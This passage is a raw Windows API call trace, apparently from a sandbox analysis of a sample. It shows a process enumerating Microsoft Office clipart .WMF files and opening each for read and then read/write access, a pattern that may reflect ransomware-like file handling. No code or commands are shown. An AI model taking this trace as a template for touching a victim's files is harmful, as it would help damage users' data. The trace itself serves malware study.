returned 1 [0101.767] AreFileApisANSI () returned 1 [0101.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 69 [0101.767] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12c8)) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0101.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.767] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04384_.WMF", cAlternateFileName="")) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.768] AreFileApisANSI () returned 1 [0101.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.894] AreFileApisANSI () returned 1 [0101.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 69 [0101.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.895] GetFileType (hFile=0x368) returned 0x1 [0101.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.895] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.895] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.896] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.896] CloseHandle (hObject=0x368) returned 1 [0101.896] AreFileApisANSI () returned 1 [0101.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 69 [0101.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.896] GetFileType (hFile=0x368) returned 0x1 [0101.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.896] CloseHandle (hObject=0x368) returned 1 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.898] AreFileApisANSI () returned 1 [0101.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 69 [0101.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1384)) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0101.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.898] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04385_.WMF", cAlternateFileName="")) returned 1 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0101.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.899] AreFileApisANSI () returned 1 [0101.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.899] AreFileApisANSI () returned 1 [0101.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 69 [0101.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.900] GetFileType (hFile=0x368) returned 0x1 [0101.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.901] CloseHandle (hObject=0x368) returned 1 [0101.901] AreFileApisANSI () returned 1 [0101.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 69 [0101.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.901] GetFileType (hFile=0x368) returned 0x1 [0101.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.901] CloseHandle (hObject=0x368) returned 1 [0101.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 